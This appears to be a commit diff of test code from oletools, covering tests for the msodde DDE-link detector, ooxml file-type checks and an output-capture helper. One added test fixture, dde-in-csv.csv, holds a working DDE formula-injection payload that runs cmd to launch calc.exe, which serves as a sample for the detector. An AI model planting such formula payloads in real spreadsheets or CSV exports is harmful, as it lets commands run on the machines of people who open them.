| 87 | + os.write(handle, sample_text.encode('ascii')) | ||
| 88 | + os.close(handle) | ||
| 89 | + handle = 0 | ||
| 90 | + args = [filename, ] | ||
| 91 | + if self.DO_DEBUG: | ||
| 92 | + args += ['-l', 'debug'] | ||
| 93 | + | ||
| 94 | + with OutputCapture() as capturer: | ||
| 95 | + capturer.reload_module(msodde) # re-create logger | ||
| 96 | + ret_code = msodde.main(args) | ||
| 97 | + self.assertEqual(ret_code, 0, 'checking sample resulted in ' | ||
| 98 | + 'error:\n' + sample_text) | ||
| 99 | + return capturer | ||
| 100 | + | ||
| 101 | + except Exception: | ||
| 102 | + raise | ||
| 103 | + finally: | ||
| 104 | + if handle: | ||
| 105 | + os.close(handle) | ||
| 106 | + handle = 0 # just in case | ||
| 107 | + if filename: | ||
| 108 | + if self.DO_DEBUG: | ||
| 109 | + print('keeping for debug purposes: {0}'.format(filename)) | ||
| 110 | + else: | ||
| 111 | + os.remove(filename) | ||
| 112 | + filename = None # just in case | ||
| 113 | + | ||
| 114 | + def get_dde_from_output(self, capturer): | ||
| 115 | + """ helper to read dde links from captured output | ||
| 116 | + | ||
| 117 | + duplicate in tests/msodde/test_basic | ||
| 118 | + """ | ||
| 119 | + have_start_line = False | ||
| 120 | + result = [] | ||
| 121 | + for line in capturer: | ||
| 122 | + if self.DO_DEBUG: | ||
| 123 | + print('captured: ' + line) | ||
| 124 | + if not line.strip(): | ||
| 125 | + continue # skip empty lines | ||
| 126 | + if have_start_line: | ||
| 127 | + result.append(line) | ||
| 128 | + elif line == 'DDE Links:': | ||
| 129 | + have_start_line = True | ||
| 130 | + | ||
| 131 | + self.assertTrue(have_start_line) # ensure output was complete | ||
| 132 | + return result | ||
| 133 | + | ||
| 134 | + | ||
| 135 | +# just in case somebody calls this file as a script | ||
| 136 | +if __name__ == '__main__': | ||
| 137 | + unittest.main() |
tests/ooxml/test_basic.py
| @@ -12,24 +12,33 @@ from oletools import ooxml | @@ -12,24 +12,33 @@ from oletools import ooxml | ||
| 12 | class TestOOXML(unittest.TestCase): | 12 | class TestOOXML(unittest.TestCase): |
| 13 | """ Tests my cool new feature """ | 13 | """ Tests my cool new feature """ |
| 14 | 14 | ||
| 15 | + DO_DEBUG = False | ||
| 16 | + | ||
| 15 | def test_all_rough(self): | 17 | def test_all_rough(self): |
| 16 | """Checks all samples, expect either ole files or good ooxml output""" | 18 | """Checks all samples, expect either ole files or good ooxml output""" |
| 17 | acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \ | 19 | acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \ |
| 18 | ooxml.DOCTYPE_POWERPOINT | 20 | ooxml.DOCTYPE_POWERPOINT |
| 21 | + | ||
| 22 | + # files that are neither OLE nor xml: | ||
| 19 | except_files = 'empty', 'text' | 23 | except_files = 'empty', 'text' |
| 20 | - except_extns = '.xml', '.rtf' | 24 | + except_extns = '.xml', '.rtf', '.csv' |
| 25 | + | ||
| 26 | + # analyse all files in data dir | ||
| 21 | for base_dir, _, files in os.walk(DATA_BASE_DIR): | 27 | for base_dir, _, files in os.walk(DATA_BASE_DIR): |
| 22 | for filename in files: | 28 | for filename in files: |
| 23 | if filename in except_files: | 29 | if filename in except_files: |
| 24 | - #print('skip file: ' + filename) | 30 | + if self.DO_DEBUG: |
| 31 | + print('skip file: ' + filename) | ||
| 25 | continue | 32 | continue |
| 26 | if splitext(filename)[1] in except_extns: | 33 | if splitext(filename)[1] in except_extns: |
| 27 | - #print('skip extn: ' + filename) | 34 | + if self.DO_DEBUG: |
| 35 | + print('skip extn: ' + filename) | ||
| 28 | continue | 36 | continue |
| 29 | 37 | ||
| 30 | full_name = join(base_dir, filename) | 38 | full_name = join(base_dir, filename) |
| 31 | if isOleFile(full_name): | 39 | if isOleFile(full_name): |
| 32 | - #print('skip ole: ' + filename) | 40 | + if self.DO_DEBUG: |
| 41 | + print('skip ole: ' + filename) | ||
| 33 | continue | 42 | continue |
| 34 | try: | 43 | try: |
| 35 | doctype = ooxml.get_type(full_name) | 44 | doctype = ooxml.get_type(full_name) |
| @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase): | @@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase): | ||
| 38 | self.assertTrue(doctype in acceptable, | 47 | self.assertTrue(doctype in acceptable, |
| 39 | msg='Doctype "{0}" for {1} not acceptable' | 48 | msg='Doctype "{0}" for {1} not acceptable' |
| 40 | .format(doctype, full_name)) | 49 | .format(doctype, full_name)) |
| 41 | - #print('ok: ' + filename + doctype) | 50 | + if self.DO_DEBUG: |
| 51 | + print('ok: {0} --> {1}'.format(filename, doctype)) | ||
| 42 | 52 | ||
| 43 | 53 | ||
| 44 | # just in case somebody calls this file as a script | 54 | # just in case somebody calls this file as a script |
tests/test-data/msodde/dde-in-csv.csv
0 → 100644
| 1 | +=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0 |
tests/test_utils/output_capture.py
| @@ -2,13 +2,20 @@ | @@ -2,13 +2,20 @@ | ||
| 2 | 2 | ||
| 3 | from __future__ import print_function | 3 | from __future__ import print_function |
| 4 | import sys | 4 | import sys |
| 5 | +import logging | ||
| 5 | 6 | ||
| 6 | 7 | ||
| 7 | # python 2/3 version conflict: | 8 | # python 2/3 version conflict: |
| 8 | if sys.version_info.major <= 2: | 9 | if sys.version_info.major <= 2: |
| 9 | from StringIO import StringIO | 10 | from StringIO import StringIO |
| 11 | + # reload is a builtin | ||
| 10 | else: | 12 | else: |
| 11 | from io import StringIO | 13 | from io import StringIO |
| 14 | + if sys.version_info.minor < 4: | ||
| 15 | + from imp import reload | ||
| 16 | + else: | ||
| 17 | + from importlib import reload | ||
| 18 | + | ||
| 12 | 19 | ||
| 13 | class OutputCapture: | 20 | class OutputCapture: |
| 14 | """ context manager that captures stdout | 21 | """ context manager that captures stdout |
| @@ -24,6 +31,10 @@ class OutputCapture: | @@ -24,6 +31,10 @@ class OutputCapture: | ||
| 24 | # ...or test all output in one go | 31 | # ...or test all output in one go |
| 25 | some_test(capturer.get_data()) | 32 | some_test(capturer.get_data()) |
| 26 | 33 | ||
| 34 | + In order to solve issues with old logger instances still remembering closed | ||
| 35 | + StringIO instances as "their" stdout, logging is shutdown and restarted | ||
| 36 | + upon entering this Context Manager. This means that you may have to reload | ||
| 37 | + your module, as well. | ||
| 27 | """ | 38 | """ |
| 28 | 39 | ||
| 29 | def __init__(self): | 40 | def __init__(self): |
| @@ -32,6 +43,11 @@ class OutputCapture: | @@ -32,6 +43,11 @@ class OutputCapture: | ||
| 32 | self.data = None | 43 | self.data = None |
| 33 | 44 | ||
| 34 | def __enter__(self): | 45 | def __enter__(self): |
| 46 | + # Avoid problems with old logger instances that still remember an old | ||
| 47 | + # closed StringIO as their sys.stdout | ||
| 48 | + logging.shutdown() | ||
| 49 | + reload(logging) | ||
| 50 | + | ||
| 35 | # replace sys.stdout with own buffer. | 51 | # replace sys.stdout with own buffer. |
| 36 | self.orig_stdout = sys.stdout | 52 | self.orig_stdout = sys.stdout |
| 37 | sys.stdout = self.buffer | 53 | sys.stdout = self.buffer |
| @@ -61,3 +77,7 @@ class OutputCapture: | @@ -61,3 +77,7 @@ class OutputCapture: | ||
| 61 | def __iter__(self): | 77 | def __iter__(self): |
| 62 | for line in self.get_data().splitlines(): | 78 | for line in self.get_data().splitlines(): |
| 63 | yield line | 79 | yield line |
| 80 | + | ||
| 81 | + def reload_module(self, mod): | ||
| 82 | + """ Wrapper around reload function for different python versions """ | ||
| 83 | + return reload(mod) |